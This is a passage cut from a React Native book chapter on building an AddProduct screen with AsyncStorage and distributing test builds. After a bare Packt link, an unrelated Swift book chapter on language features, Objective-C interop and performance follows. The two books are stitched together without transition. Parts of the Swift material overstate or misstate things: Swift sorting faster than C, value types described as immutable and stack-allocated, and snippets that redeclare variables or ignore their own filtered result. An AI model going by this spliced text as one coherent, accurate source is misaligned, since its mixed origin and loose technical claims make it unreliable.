              <Text style={{ color: productIsInList ? '#bbb' : '#000' }}>
                {product.name}
              </Text>
              {productIsInList &&
                <Text note>{'Already in shopping list'}</Text>}
            </Body>
          </ListItem>
        );
      })}
    </List>
  );
}
...

Inside our render method, we use Array.map to iterate over and print each available product, checking whether it is already on the current shopping list in order to display the Already in shopping list note warning the user.

Of course, we still need a better layout, buttons, and event handlers for all the possible user actions. Let's start improving our render method to put all the functionality in place. As with the ShoppingList screen, we want the user to be able to interact with our AddProduct component, so we will add some event handlers to respond to user actions.
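A quick robustness note on the componentWillMount above: it assumes this screen is always reached through navigate() with params attached. If it could ever be opened without them, a defensive variant (my sketch, not the book's listing) avoids a crash on undefined params:

/*** AddProduct.js (defensive variant) ***/
...
async componentWillMount() {
  const savedProducts = await AsyncStorage.getItem('@allProducts');
  if (savedProducts) {
    this.setState({ allProducts: JSON.parse(savedProducts) });
  }
  // params is undefined when no params were passed to navigate()
  const params = this.props.navigation.state.params || {};
  this.setState({ productsInList: params.productsInList || [] });
}
...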
With that in mind, our render method should look something like this:

/*** AddProduct.js ***/
...
render() {
  return (
    <Container>
      <Content>
        <List>
          {this.state.allProducts.map(product => {
            const productIsInList = this.state.productsInList.find(
              p => p.id === product.id
            );
            return (
              <ListItem
                key={product.id}
                onPress={this._handleProductPress.bind(this, product)}
              >
                <Body>
                  <Text style={{ color: productIsInList ? '#bbb' : '#000' }}>
                    {product.name}
                  </Text>
                  {productIsInList &&
                    <Text note>{'Already in shopping list'}</Text>}
                </Body>
                <Right>
                  <Icon
                    ios="ios-remove-circle"
                    android="md-remove-circle"
                    style={{ color: 'red' }}
                    onPress={this._handleRemovePress.bind(this, product)}
                  />
                </Right>
              </ListItem>
            );
          })}
        </List>
      </Content>
      <Fab
        style={{ backgroundColor: '#5067FF' }}
        onPress={this._handleAddProductPress.bind(this)}
      >
        <Icon name="add" />
      </Fab>
    </Container>
  );
}
...

There are three event handlers responding to the three press events on this component:

- On the blue <Fab> button, which is in charge of adding new products to the products list
- On each <ListItem>, which will add the product to the shopping list
- On the delete icon inside each <ListItem>, to remove the product from the list of products that can be added to the shopping list

Let's start with adding new products to the available products list when the user presses the <Fab> button:

/*** AddProduct.js ***/
...
_handleAddProductPress() {
  prompt(
    'Enter product name',
    '',
    [
      { text: 'Cancel', style: 'cancel' },
      { text: 'OK', onPress: this.addNewProduct.bind(this) }
    ],
    { type: 'plain-text' }
  );
}
...

Here we are using the prompt function from the react-native-prompt-android module. Despite its name, it's a cross-platform pop-up prompt library, which we will use to add products through the addNewProduct function we created earlier. We need to import the prompt function before using it, as follows:

import prompt from 'react-native-prompt-android';

Once the user enters the name of the product and presses OK, the product is added to the list, so we can move on to the next event handler: adding products to the shopping list when the user taps the product name:

/*** AddProduct.js ***/
...
_handleProductPress(product) {
  const productIndex = this.state.productsInList.findIndex(
    p => p.id === product.id
  );
  if (productIndex > -1) {
    this.setState({
      productsInList: this.state.productsInList.filter(
        p => p.id !== product.id
      )
    });
    this.props.navigation.state.params.deleteProduct(product);
  } else {
    this.setState({
      productsInList: this.state.productsInList.concat(product)
    });
    this.props.navigation.state.params.addProduct(product);
  }
}
...

This handler checks whether the selected product is already on the shopping list. If it is, it removes it by calling deleteProduct from the navigation params and updates the component's state by calling setState. Otherwise, it adds the product to the shopping list by calling addProduct from the navigation params and refreshes the local state by calling setState.

Finally, we will add an event handler for the delete icon on each <ListItem>, so the user can remove products from the list of available products:

/*** AddProduct.js ***/
...
async _handleRemovePress(product) {
  const allProducts = this.state.allProducts.filter(
    p => p.id !== product.id
  );
  this.setState({ allProducts });
  await AsyncStorage.setItem('@allProducts', JSON.stringify(allProducts));
}
...

We need to remove the product from the component's local state, but also from AsyncStorage, so it doesn't show up during later runs of our app.
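Since AsyncStorage calls can fail (for example, if serialization or the underlying storage throws), a more defensive version of these helpers would wrap the awaits in try/catch. This is my sketch, not the book's listing:

/*** AddProduct.js (defensive variant) ***/
...
async _handleRemovePress(product) {
  const allProducts = this.state.allProducts.filter(
    p => p.id !== product.id
  );
  this.setState({ allProducts });
  try {
    await AsyncStorage.setItem('@allProducts', JSON.stringify(allProducts));
  } catch (err) {
    // storage failed: the in-memory list stays consistent for this session
    console.warn('Could not persist products', err);
  }
}
...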
We now have all the pieces to build our AddProduct screen, so let's take a look at the general structure of this component:

import React from 'react';
import prompt from 'react-native-prompt-android';
import { AsyncStorage } from 'react-native';
import { ... } from 'native-base';

export default class AddProduct extends React.Component {
  static navigationOptions = {
    title: 'Add a product'
  };

  constructor(props) { ... }

  async componentWillMount() { ... }

  async addNewProduct(name) { ... }

  /*** User Actions Handlers ***/
  _handleProductPress(product) { ... }
  _handleAddProductPress() { ... }
  async _handleRemovePress(product) { ... }

  /*** Render ***/
  render() { ... }
}

The structure is very similar to the one we built for ShoppingList: the navigationOptions, a constructor building the initial state, user action handlers, and a render method. In this case, we added a couple of async methods as a convenient way to deal with AsyncStorage.

Running our app on a simulator/emulator is a very reliable way to get a feel for how our app will behave on a mobile device. We can simulate touch gestures, poor network connectivity, or even memory pressure when working on simulators/emulators. But eventually, we will want to deploy the app to a physical device, so we can perform more in-depth testing.

There are several options for installing or distributing an app built with React Native, a direct cable connection being the easiest one. Facebook keeps an updated guide on how to achieve direct installation on React Native's site, but there are other alternatives when the time comes to distribute the app to other developers, testers, or designated users.

TestFlight is an awesome tool for distributing apps to beta testers and developers, but it comes with a big drawback: it only works for iOS. It's really simple to set up and use, as it is integrated into iTunes Connect, and Apple considers it the official tool for distributing apps within a development team. On top of that, it's absolutely free, and its usage limits are quite generous:

- Up to 25 testers in your team
- Up to 30 devices per tester in your team
- Up to 2,000 external testers outside your team (with grouping capabilities)

In short, TestFlight is the platform to choose when you target your apps only at iOS devices.

Since, in this book, we want to focus on cross-platform development, we will introduce other alternatives for distributing our apps to both iOS and Android devices from the same platform.

Diawi is a website where developers can upload their .ipa and .apk files (the compiled app) and share the links with anybody, so the app can be downloaded and installed on any iOS or Android device connected to the internet. The process is simple:

- Build the .ipa (iOS) / .apk (Android) in Xcode/Android Studio.
- Drag and drop the generated .ipa/.apk file onto Diawi's site.
- Share the link created by Diawi with your list of testers by email or any other method.

Links are private and can be password protected for apps with higher security needs. The main downside is the management of the testing devices: once the links are distributed, Diawi loses control over them, so the developer cannot know which versions were downloaded and tested. If managing the list of testers manually is an option, Diawi is a good alternative to TestFlight.
If we need to track which versions were distributed to which testers and whether they have started testing the app, we should give Installr a try. Functionality-wise, it is quite similar to Diawi, but it also includes a dashboard showing who the users are, which apps were sent to each of them individually, and the status of the app on each testing device (not installed, installed, or opened). This dashboard is quite powerful and definitely a big plus when one of our requirements is good visibility over our testers, devices, and builds. The downside of Installr is that its free plan only covers three testing devices per build, although it offers a cheap one-time payment scheme in case we really need that number increased. It's a very reasonable option when we need visibility and cross-platform distribution.

Over the course of this chapter, we learned how to start up a React Native project and build an app that includes basic navigation and handles several kinds of user interaction. We saw how to handle persistent data and basic state through the navigation module, so we could transition between the screens in our project. All these patterns can be used to build plenty of simple apps but, in the next chapter, we will dive deeper into more complex navigation patterns and into how to communicate with and process external data fetched from the internet, which will enable us to structure and prepare our app for growth. On top of that, we will use MobX, a JavaScript library for state management, which will make our domain data available to all the screens in our app in a very simple and effective way.
https://www.packtpub.com/product/react-native-blueprints/9781787288096
In 2014, Apple released a new programming language called Swift. Swift was designed from scratch with many powerful features. It is statically typed and very safe. It has a clean, pleasant syntax; it's fast; it's flexible; and it has many other advantages that you will learn about later in this book. Swift is very powerful and has big potential. Apple has set big expectations for Swift, and their main goal is for it to replace Objective-C, which is going to happen in the near future.

In this chapter, you will become familiar with the Swift programming language: what it was made for, and what its advantages and features are. We will also make our first Swift application and see how easy it is to integrate with existing Objective-C code. In this chapter, we will cover the following topics:

- Welcome to Swift
- Writing Swift code
- Swift interoperability
- The importance of performance and key performance metrics

I can guess you opened this book because you are interested in speed and are probably wondering, "How fast can Swift be?" Before you even start learning Swift and discovering all the good things about it, let's answer that right here and right now.

Let's take an array of 100,000 random numbers; sort it in Swift, Objective-C, and C using the standard sort function from the standard library (sort in Swift, qsort in C, and compare in Objective-C); and measure how much time each takes.

And the winner is: Swift! Swift is 14.5 times faster than Objective-C and 2.3 times faster than C. In other examples and experiments, C is usually faster than Swift, and Swift is way faster than Objective-C. These measurements were done with Xcode 7.0 beta 6 and Swift 2.0. It's important to highlight that the improvements in Swift 2.0 were mainly focused on making it cleaner, more powerful, safer, and more stable, and on preparing it for open sourcing. Swift's performance hasn't reached its full potential yet, and the future is very exciting!
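As a rough illustration, a benchmark of this shape can be put together in a few lines. This is only a sketch in Swift 2-era syntax, assuming arc4random() as the random source; it is not the book's actual measurement harness:

import Foundation

let numbers = (0..<100_000).map { _ in Int(arc4random()) }

let start = NSDate()
let sortedNumbers = numbers.sort() // Swift 2's non-mutating standard sort
let elapsed = NSDate().timeIntervalSinceDate(start)

print("Sorted \(sortedNumbers.count) numbers in \(elapsed) seconds")

Comparable harnesses in C and Objective-C would time qsort and compare-based sorting over the same input.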
The Swift programming language was designed by Apple from the ground up. It was released with the slogan "Objective-C without the C," meaning that Swift carries no burden of backward compatibility. It's totally new, with no old baggage. Before you start learning all the power of Swift, I think it would be useful to answer a few questions about why you should learn it, and to dispel any doubts you may have.

Swift is a very new programming language, but it has become very popular and has gained huge traction. However, many iOS and OS X developers ask these questions:

- Should I learn Swift?
- What should I learn, Swift or Objective-C?
- Is Objective-C going to stay or die?
- Is Swift ready for production apps?
- Is Swift faster than Objective-C or C?
- What applications can I write using Swift?

My answer is, "Yes. Definitely!" You should learn Swift. It doesn't matter whether you are a new iOS and OS X developer or you have an Objective-C background; you should definitely learn Swift. If you are a new developer, it's really useful to start with Swift, because you will learn programming basics and techniques in Swift, and further Swift learning will be much easier. Although it would definitely be useful to learn Objective-C as well, I recommend learning Swift first so that you build your programming mindset on Swift. If you already have some experience in Objective-C, then you should try Swift as soon as possible. It will not only give you the knowledge of a new programming language, but also open the door to new ideas and ways of solving problems in Objective-C.

We can see that Objective-C has started evolving right now because of Swift. Objective-C has many limitations because of its backward compatibility with C. It was created in 1983, and it will die much sooner than Swift. After the release of Swift version 1.0, in only a year's time we saw many Swift applications successfully developed and released on the App Store. In this period, many Swift tools and open source libraries were created that increase development productivity.

During WWDC 2015, Apple announced that Swift will be made open source. This means that Swift can be used to write any software, not only iOS or OS X apps. You could write a piece of server-side code or a web app in Swift. This is one more reason to learn it.

On the other hand, Swift is under constant development. There were many changes and improvements in version 1.2, and even more changes in version 2.0. Although it's very easy to upgrade to a newer Swift version with the Xcode migrator, it's something you should keep in mind.

Swift has some promising performance characteristics. We saw a huge performance improvement in the Swift 1.2 release, and further improvements in Swift 2.0. You have seen from the previous example how fast Swift is, and in general, Swift has more potential to achieve high performance than Objective-C.

Finally, I want to mention a phrase I really like, by Bryan Irace: "When the iOS SDK says 'Jump', ask 'How high?'" Don't wait; learn Swift!

At this point, you know that you should learn Swift, and you shouldn't have any doubts. Let's take a look at what makes Swift so amazing and powerful. Here is a list of a few important features that we are going to cover:

- Clean and beautiful syntax
- Type safety
- Rich type system
- Powerful value types
- A multiparadigm language: object-oriented, protocol-oriented, and functional
- Fast
- Safe

Powerful features and performance are important, but I think that cleanness and beauty are no less important. You write and read code every day, and it has to be clean and beautiful so that you can enjoy it. Swift is very clean and beautiful, and the following are the main features that make it so.

Semicolons were created for the compiler. They help the compiler understand the source code and split it into commands and instructions. But source code is written for people, and we should probably remove the compiler instructions from it:

var number = 10
number + 5

// Not recommended
var count = 1; var age = 18; age++

There is no need for a semicolon (;) at the end of every instruction. It may seem like a very small feature, but it makes code much nicer and easier to write and read. You can, however, add semicolons if you want. A semicolon is required when you have two instructions on the same line. There are also some exceptions where you have to use semicolons, a for loop being one example (for var i = 0; i < 10; i++), but in that context, they serve a different purpose.

With type inference, you don't need to specify the types of variables and constants; Swift automatically detects the correct type from the context. Sometimes, however, you have to specify the type explicitly and provide a type annotation.
When no value is assigned to a variable, Swift can't infer what type that variable should be:

var count = 10           //count: Int
var name = "Sara"        //name: String
var empty = name.isEmpty //empty: Bool

// Not recommended
var count: Int = 10
var name: String = "Sara"
var empty: Bool = name.isEmpty

// When you must provide a type annotation
var count: Int
var name: String
count = 10
name = "Sara"

In most cases, Swift can infer a variable's type from the value assigned to it.

The list of Swift's clean code features is very long; here are a few of them: closure syntax, default parameter values for functions, external parameter names, default initializers, subscripts, and operators.

Clean closure syntax: A closure is a standalone block of code that can be treated as a lightweight unnamed function. It has the same functionality as a function but a cleaner syntax. You can assign it to a variable, call it, or pass it as an argument to a function. For example, { $0 + 10 } is a closure:

let add10 = { $0 + 10 }
add10(5)

let numbers = [1, 2, 3, 4]
numbers.map { $0 + 10 }
numbers.map(add10)

Default parameter values and external names: When declaring a function, you can define default values for parameters and give them different external names, which are used when you call that function. With default parameters, you can define one function but call it with different arguments. This reduces the need to create unnecessary functions:

func complexFunc(x: Int, _ y: Int = 0, extraNumber z: Int = 0, name: String = "default") -> String {
  return "\(name): \(x) + \(y) + \(z) = \(x + y + z)"
}

complexFunc(10)
complexFunc(10, 11)
complexFunc(10, 11, extraNumber: 20, name: "name")

Default and memberwise initializers: In some scenarios, Swift can create initializers for structures and base classes for you. Less code, better code:

struct Person {
  let name: String
  let lastName: String
  let age: Int
}

Person(name: "Jon", lastName: "Bosh", age: 23)

Subscripts: These are a nice way of accessing the member elements of a collection. You can use any type as a key:

let numbers = [1, 2, 3, 4]
let num2 = numbers[2]

let population = [
  "China" : 1_370_940_000,
  "Australia" : 23_830_900
]
population["Australia"]

You can also define a subscript operator for your own types, or extend existing types by adding your own subscript operator in an extension:

// Custom subscript
struct Stack {
  private var items: [Int]

  subscript (index: Int) -> Int {
    return items[index]
  }

  // Stack standard functions
  mutating func push(item: Int) {
    items.append(item)
  }

  mutating func pop() -> Int {
    return items.removeLast()
  }
}

var stack = Stack(items: [10, 2])
stack.push(6)
stack[2]
stack.pop()

Operators: These are symbols that represent functionality, for example, the + operator. You can extend your types to support standard operators or create your own custom operators:

let numbers = [10, 20]
let array = [1, 2, 3]
let res = array + numbers

struct Vector {
  let x: Int
  let y: Int
}

func + (lhs: Vector, rhs: Vector) -> Vector {
  return Vector(x: lhs.x + rhs.x, y: lhs.y + rhs.y)
}

let a = Vector(x: 10, y: 5)
let b = Vector(x: 2, y: 3)
let c = a + b

guard: The guard statement checks whether a condition is met before the code continues executing. If the condition isn't met, the code must exit the scope. The guard statement removes nested conditional statements and the Pyramid of Doom problem.

Note: You can read more about the Pyramid of Doom antipattern online.
func doItGuard(x: Int?, y: Int) {
  guard let x = x else { return }
  //handle x
  print(x)

  guard y > 10 else { return }
  //handle y
  print(y)
}

As you can see, Swift is very clean and nice. The best way to appreciate how clean and beautiful Swift is, is to implement the same functionality in Swift and Objective-C. Let's say we have a list of people, and we need to find the people matching a certain age criterion and make their names lowercase.

This is what the Swift version of this code looks like:

struct Person {
  let name: String
  let age: Int
}

let people = [
  Person(name: "Sam", age: 10),
  Person(name: "Sara", age: 24),
  Person(name: "Ola", age: 42),
  Person(name: "Jon", age: 19)
]

let kids = people.filter { person in person.age < 18 }
let names = people.map { $0.name.lowercaseString }

The following is what the Objective-C version of this code looks like:

//Person.h file
@import Foundation;

@interface Person : NSObject
@property (nonatomic) NSString *name;
@property (nonatomic) NSInteger age;
- (instancetype)initWithName:(NSString *)name age:(NSInteger)age;
@end

//Person.m file
#import "Person.h"

@implementation Person
- (instancetype)initWithName:(NSString *)name age:(NSInteger)age {
  self = [super init];
  if (!self) return nil;
  _name = name;
  _age = age;
  return self;
}
@end

NSArray *people = @[
  [[Person alloc] initWithName:@"Sam" age:10],
  [[Person alloc] initWithName:@"Sara" age:24],
  [[Person alloc] initWithName:@"Ola" age:42],
  [[Person alloc] initWithName:@"Jon" age:19]
];

NSArray *kids = [people filteredArrayUsingPredicate:
  [NSPredicate predicateWithFormat:@"age < 18"]];

NSMutableArray *names = [NSMutableArray new];
for (Person *person in people) {
  [names addObject:person.name.lowercaseString];
}

The results are quite astonishing: the Swift code takes 14 lines, whereas the Objective-C code takes 40 lines across the .h and .m files. Now you see the difference.

Swift is a very safe programming language, and it does a lot of security checks at compile time. The goal is to catch as many issues as possible during compilation, not when you run the application. Swift is a type-safe programming language. If you make a mistake with a type, such as trying to add an Int and a String or passing the wrong argument to a function, you will get an error:

let number = 10
let part = 1.5
number + part // Error
let result = Double(number) + part

Swift doesn't do any typecasting for you; you have to do it explicitly, and this makes Swift even safer. In this example, we had to cast an Int number to the Double type before adding it.

A very important safety feature introduced in Swift is the optional. An optional is a way of representing the absence of a value: nil. You can't assign nil to a variable of the String type. Instead, you must declare that this variable can be nil by making it the optional String? type:

var name: String = "Sara"
name = nil //Error. You can't assign nil to a non-optional type

var maybeName: String?
maybeName = "Sara"
maybeName = nil // This is allowed now

To make a type optional, you put a question mark (?) after the type, for example, Int?, String?, and Person?. You can also declare an optional type using the Optional keyword, Optional<String>, but the shorter form using ? is preferred:

var someName: Optional<String>

Optionals are like a box that contains either some value or nothing. Before using the value, you need to unwrap it first.
This technique is called unwrapping optionals, or optional binding when you assign the unwrapped value to a constant:

if let name = maybeName {
  var res = "Name - " + name
} else {
  print("No name")
}

Swift 2.0 has powerful and very simple-to-use error handling. Its syntax is very similar to the exception handling syntax in other languages, but it works in a different way. It has the throw, catch, and try keywords. Swift error handling consists of a few components, explained as follows:

- An error object represents an error, and it must conform to the ErrorType protocol:

enum MyErrors: ErrorType {
  case NotFound
  case BadInstruction
}

- Every function that can throw an error must be declared with the throws keyword after its parameter list:

func dangerous(x: Int) throws
func dangerousIncrease(x: Int) throws -> Int

- To throw an error, use the throw keyword:

throw MyErrors.BadInstruction

- When you call a function that can throw an error, you must use the try keyword. This indicates that the function can fail, in which case the following code will not be executed:

try dangerous(10)

- If an error occurs, it must be caught and handled in a do-catch block, or thrown further by declaring the calling function with throws:

do {
  try dangerous(10)
} catch {
  print("error")
}

Let's take a look at a code example that shows how to work with errors in Swift:

enum Error: ErrorType {
  case NotNumber(String)
  case Empty
}

func increase(x: String) throws -> String {
  if x.isEmpty {
    throw Error.Empty
  }
  guard let num = Int(x) else {
    throw Error.NotNumber(x)
  }
  return String(num + 1)
}

do {
  try increase("10")
  try increase("Hi")
} catch Error.Empty {
  print("Empty")
} catch Error.NotNumber(let string) {
  print("\"\(string)\" is not a number")
} catch {
  print(error)
}

There are many other safety features in Swift:

- Memory safety, which ensures that values are initialized before use
- A two-phase initialization process with security checks
- Required method overriding
- And many others

Swift has the following powerful types:

Structures are flexible building blocks that can hold data and methods to manipulate that data. Structures are very similar to classes, but they are value types:

struct Person {
  let name: String
  let lastName: String

  func fullName() -> String {
    return name + " " + lastName
  }
}

let sara = Person(name: "Sara", lastName: "Johan")
sara.fullName()

Tuples are a way of grouping multiple values into one type. Values inside a tuple can have different types. Tuples are very useful for returning multiple values from a function. You can access values inside a tuple by index, or by name if the tuple has named elements; or you can assign each item in the tuple to a constant or a variable:

let numbers = (1, 5.5)
numbers.0
numbers.1

let result: (code: Int, message: String) = (404, "Not found")
result.code
result.message

let (code, message) = (404, "Not found")

Range represents a range of numbers from x to y. There are also two range operators that help create ranges: the closed range operator and the half-open range operator:

let range = Range(start: 0, end: 100)
let ten = 1...10  //Closed range, includes the last value, 10
let nine = 0..<10 //Half-open, does not include 10

Enumerations represent a group of common, related values. An enumeration's members can be empty, have a raw value, or have an associated value of any type. Enumerations are first-class types; they can have methods, computed properties, initializers, and other features.
They are great for type-safe coding:

enum Action: String {
  case TakePhoto
  case SendEmail
  case Delete
}

let sendEmail = Action.SendEmail
sendEmail.rawValue //"SendEmail"

let delete = Action(rawValue: "Delete")

There are two very powerful value types in Swift: struct and enum. Almost all types in the Swift standard library are implemented as immutable value types using struct or enum, for example, Range, String, Array, Int, Dictionary, Optional, and others. Value types have four big advantages over reference types; they are:

- Immutable
- Thread safe
- Singly owned
- Allocated on the stack

Value types are immutable and have only a single owner. The value's data is copied on assignment and when it is passed as an argument to a function:

var str = "Hello"
var str2 = str
str += " :)"

Swift is a multiparadigm programming language. It supports many different programming styles, such as object-oriented, protocol-oriented, functional, generic, block-structured, imperative, and declarative programming. Let's take a look at a few of them in more detail here.

Swift supports the object-oriented programming style. It has classes with a single inheritance model, the ability to conform to protocols, access control, nested types and initializers, properties with observers, and other OOP features.

The concept of protocols and protocol-oriented programming is not new, but Swift protocols have some powerful features that make them special. The general idea of protocol-oriented programming is to use protocols instead of concrete types. In this way, we can create a very flexible system with weak binding to concrete types. In Swift, you can extend protocols and provide default method implementations:

extension CollectionType {
  func findFirst (find: (Self.Generator.Element) -> Bool) -> Self.Generator.Element? {
    for x in self {
      if find(x) {
        return x
      }
    }
    return nil
  }
}

Now, every type that implements CollectionType has a findFirst method:

let a = [1, 200, 400]
let r = a.findFirst { $0 > 100 }

One big advantage of protocol-oriented programming is that we can add methods to related types and use the dot (.) syntax for method chaining, instead of using free functions and passing arguments:

let ar = [1, 200, 400]

//Old way
map(filter(map(ar) { $0 * 2 }) { $0 > 50 }) { $0 + 10 }

//New way
ar.map { $0 * 2 }
  .filter { $0 > 50 }
  .map { $0 + 10 }

Swift also supports the functional programming style. In functional languages, a function is a type, and it is treated in the same way as other types, such as Int; it is called a first-class function. Functions can be assigned to variables and passed as arguments to other functions. This really helps decouple your code and makes it more reusable. A great example is an array's filter function. It takes a function that performs the actual filtering logic, which gives us great flexibility:

// Array filter function from the Swift standard library
func filter(includeElement: (T) -> Bool) -> [T]

let numbers = [1, 2, 4]

func isEven (x: Int) -> Bool {
  return x % 2 == 0
}

let res = numbers.filter(isEven)

Swift has a very powerful feature called generics. Generics allow you to write generic code without mentioning a specific type that it should work with. Generics are very useful for building algorithms, reusable code, and frameworks. The best way to explain generics is to show an example. Let's create a minimum function that returns the smaller of two values:
func minimum(x: Int, _ y: Int) -> Int {
  return (x < y) ? x : y
}

minimum(10, 11)
minimum(11.5, 14.3) // error

This function has a limitation: it works only with integers. However, the logic of getting the smaller value is the same for all comparable types: compare them and return the smaller one. This is very generic code. Let's make our minimum function generic so it works with different types:

func minimum <T : Comparable>(x: T, _ y: T) -> T {
  return (x < y) ? x : y
}

minimum(10, 11)
minimum(10.5, 1.4)
minimum("A", "ABC")

There were two main points that Apple thought about when introducing Swift:

- The usage of the Cocoa frameworks and established Cocoa patterns
- Ease of adoption and migration

Apple took both of these points very seriously while working on Swift and made Swift work seamlessly with Objective-C. You can use all Objective-C code in Swift, and you can even use Swift in Objective-C.

Being able to use the Cocoa frameworks is crucial. All code written in Objective-C is available for use in Swift, both Apple frameworks and third-party libraries. All the Cocoa frameworks written in Objective-C are available in Swift by default; you just need to import them and then use them. Swift doesn't have header files; instead, you need to use a module name. You can also include your own Swift frameworks in the same way:

import Foundation
import UIKit
import Alamofire // Custom framework

To include your own Objective-C source files, you need to do a small setup first. The process is a bit different for application targets and framework targets, but the main idea is the same: import the Objective-C header files.

For an application target, you need to create a bridging header. A bridging header is a plain Objective-C header file in which you specify the Objective-C import statements. Xcode will show a popup offering to create and set up a bridging header for you when you add an Objective-C file to a Swift project (or vice versa) for the first time. This is the best and most convenient way to add it. If you decline Xcode's help, you can create a bridging header yourself at any time. To do that, follow these steps:

- Add a new header file to the project.
- Go to Target | Build Settings.
- Search for Objective-C Bridging Header and specify the path to the bridging header file created in step 1.

Once you have set up the bridging header, the next step is to add import statements to it:

//Bridging.h
//
// Use this file to import your target's public headers that you
// would like to expose to Swift.

#import "MyClass.h"

For a framework target, you simply need to import the .h Objective-C header files into the framework's umbrella header. The Objective-C header files must be marked as public. The umbrella header is the header in which you specify your publicly available API. Usually, it looks like this (the MySwiftKit.h umbrella header, in this example):

#import <UIKit/UIKit.h>

//! Project version number for MySwiftKit.
FOUNDATION_EXPORT double MySwiftKitVersionNumber;

//! Project version string for MySwiftKit.
FOUNDATION_EXPORT const unsigned char MySwiftKitVersionString[];

// In this header, you should import all the public headers of your framework
// using statements like #import <MySwiftKit/PublicHeader.h>
#import <SimpleFramework/MyClass.h>

Once you are done with the setup, you can use all Objective-C APIs in Swift. You can create instances, call methods, inherit from Objective-C classes, conform to protocols, and do everything else you can do in Objective-C.
In this example, we will use the Foundation classes, but the rules are the same for third-party code as well:

import UIKit
import Foundation

let date = NSDate()
date.timeIntervalSinceNow

UIColor.blackColor()
UIColor(red: 0.5, green: 1, blue: 1, alpha: 1)

class MyView: UIView {
  //custom implementation
}

Tip: Inherit from Objective-C classes only if you need to. Doing so can have a negative impact on performance.

There is free bridging between Swift types and Objective-C Foundation types. Automatic bridging happens on assignment and when you pass a value as an argument to a function:

let array = [1, 2, 3]

func takeArray(array: NSArray) { }

var objcArray: NSArray = array
takeArray(array)

Converting from Objective-C to a Swift type requires explicit type casting. There are two kinds of casting: upcasting and downcasting. Downcasting is an unsafe operation that can fail, which is why it returns an optional type:

//Upcasting, or safe casting
let otherArray: [AnyObject] = objcArray as [AnyObject]

//Downcasting, unsafe casting
if let safeNums = objcArray as? [Int] {
  safeNums[0] + 10 //11
}

let string: NSString = "Hi"
let str: String = string as String

The String type goes one step further: you can invoke Objective-C Foundation methods on the Swift String type without any type casting:

var name: String = "Name"
name.stringByAppendingString(": Sara")

Swift also makes a small improvement to Objective-C APIs so that they look more Swift-style. The biggest change is made to instance creation and initialization code: init, initWith, and other factory methods are transformed into Swift initializers:

//Objective-C
- (instancetype)initWithFrame:(CGRect)frame;
+ (UIColor *)colorWithWhite:(CGFloat)white alpha:(CGFloat)alpha;

// Swift
init(frame: CGRect)
init(white: CGFloat, alpha: CGFloat)

Another change is made to NS_ENUM and NS_OPTIONS, which become native Swift types: enum and RawOptionSetType. As you can see, the API looks a bit different; because Swift strives for cleanliness, it removes word duplication from the API nomenclature. Other method calls, properties, and names are the same as they were in Objective-C, so they should be easy to find and understand. What happens behind the scenes is that Swift generates special interface files for interacting with Objective-C. You can see these Swift interface files by holding down the command key and clicking on a type, NSDate or UIColor in our example.

It is also possible to use Swift in Objective-C, which makes Swift very easy to adopt in an existing project. You can start by adding one Swift file and move more functionality to Swift over time. The setup process is much easier than including Objective-C in Swift: all you need to do is import Swift's autogenerated header into Objective-C. The naming convention for application targets is ProductModuleName + -Swift.h, and for frameworks, it is <ProductName/ProductModuleName + -Swift.h>. Take a look at the following examples:

#import "SwiftApp-Swift.h"
#import <MySwiftKit/MySwiftKit-Swift.h>

You can inspect the content of that autogenerated file by holding down the command key and clicking on it.
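To make this direction of interop concrete, here is a small hypothetical usage example. The class name KOKGreeter and its method are invented for illustration; they assume a Swift class exposed to Objective-C in the way described next:

//SomeViewController.m (Objective-C file in the same app target)
#import "SwiftApp-Swift.h" // the autogenerated header

- (void)useSwiftClass {
    // KOKGreeter is a hypothetical Swift class exposed via @objc(KOKGreeter)
    KOKGreeter *greeter = [[KOKGreeter alloc] init];
    [greeter greet]; // calling a Swift method from Objective-C
}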
By default, Swift classes aren't exposed for use in Objective-C. There are two ways of making Swift classes available in Objective-C:

- Mark the Swift class, protocol, or enumeration with the @objc attribute. You can mark classes, methods, protocols, and enumerations with @objc. The @objc attribute also accepts an alternative name to be used in Objective-C. When you expose a Swift class by marking it with the @objc attribute, it has to inherit from an Objective-C class, and an enumeration must have a raw Int value:

@objc(KOKPerson)
class Person: NSObject {
  @objc(isMan)
  func man() -> Bool { ... }
}

@objc enum Options: Int {
  case One
  case Two
}

Now, the KOKPerson class, with its isMan method, is available for use in Objective-C.

- Inherit from an Objective-C class, NSObject for example. When you inherit from an Objective-C class, your Swift class automatically becomes available in Objective-C. You don't need to perform any extra steps in this case. You can also mark it with the @objc attribute to provide an alternative name:

class Person: NSObject {
}

Some features of Swift are not available in Objective-C, so if you plan to use Swift code from Objective-C, you should avoid using them. These are Swift-only features such as generics, tuples, Swift structures, and enumerations without an Int raw value.

There are two key characteristics of code: stability and performance. Making the code architecture very solid and stable is the most important task, but we shouldn't forget about making it fast as well. Achieving high performance can be a tricky and dangerous task. Here are a few things that you should keep in mind while working on performance improvement:

Don't optimize your code upfront. There are many articles about this topic, why it's dangerous, and why you shouldn't do it. Just don't do it and, as Donald Knuth says:

"Premature optimization is the root of all evil."

Measure first. Measure the code's performance characteristics and optimize only those parts that are slow. Almost 95 percent of code doesn't require performance optimization.

I totally agree with these points, but there is another type of performance optimization that we should think of upfront: the small decisions that we make every day, including the following:

- What type should it be, Int or String?
- Should I create a new class for new functionality or add it to an existing one?
- Should I use an array? Or maybe a set?

It seems as if these don't have any impact on the application's performance and, in most cases, they don't. However, making the right decision not only improves an application's speed, but also makes it more stable, and it gives higher productivity in application development. The small changes that we make every day make a big impact at the end of the year.

High performance is very crucial. The performance of an app is directly related to the user experience. Users want to get results immediately; they don't want to wait for a view to load, see a long Loading indicator, or see a lagging animation.

Every year, our computers and devices become more and more powerful, with more CPU speed, memory, storage, and storage speed. Performance problems could seem irrelevant because of this, but software complexity increases as well. We have more complex data to store and process, we need to show animations, and we need to do a lot of other things.

The first way of solving a performance problem is by adding more power. We can add more servers to handle data, but we can't upgrade our clients' PCs and mobile devices. Also, adding more power doesn't solve the underlying code performance issue; it just delays it for some time. The second, and correct, solution is to remove the issue that causes the performance problem. For that, we need to identify the problem, the slow piece of code, and improve it.
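To make "measure first" actionable, even a throwaway timing helper goes a long way. The following is my sketch in Swift 2-era syntax, not code from the book:

// Time a closure and print how long it took.
func measure(label: String, block: () -> Void) {
    let start = NSDate()
    block()
    let elapsed = NSDate().timeIntervalSinceDate(start)
    print("\(label) took \(elapsed) seconds")
}

measure("sum") {
    _ = (1...1_000_000).reduce(0, combine: +)
}

Wrapping a suspect piece of code this way gives you a quick baseline before and after a change, without reaching for Instruments.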
There are many things that impact an application's performance and user experience. We will cover the following key metrics:

- Operation performance speed
- Memory usage
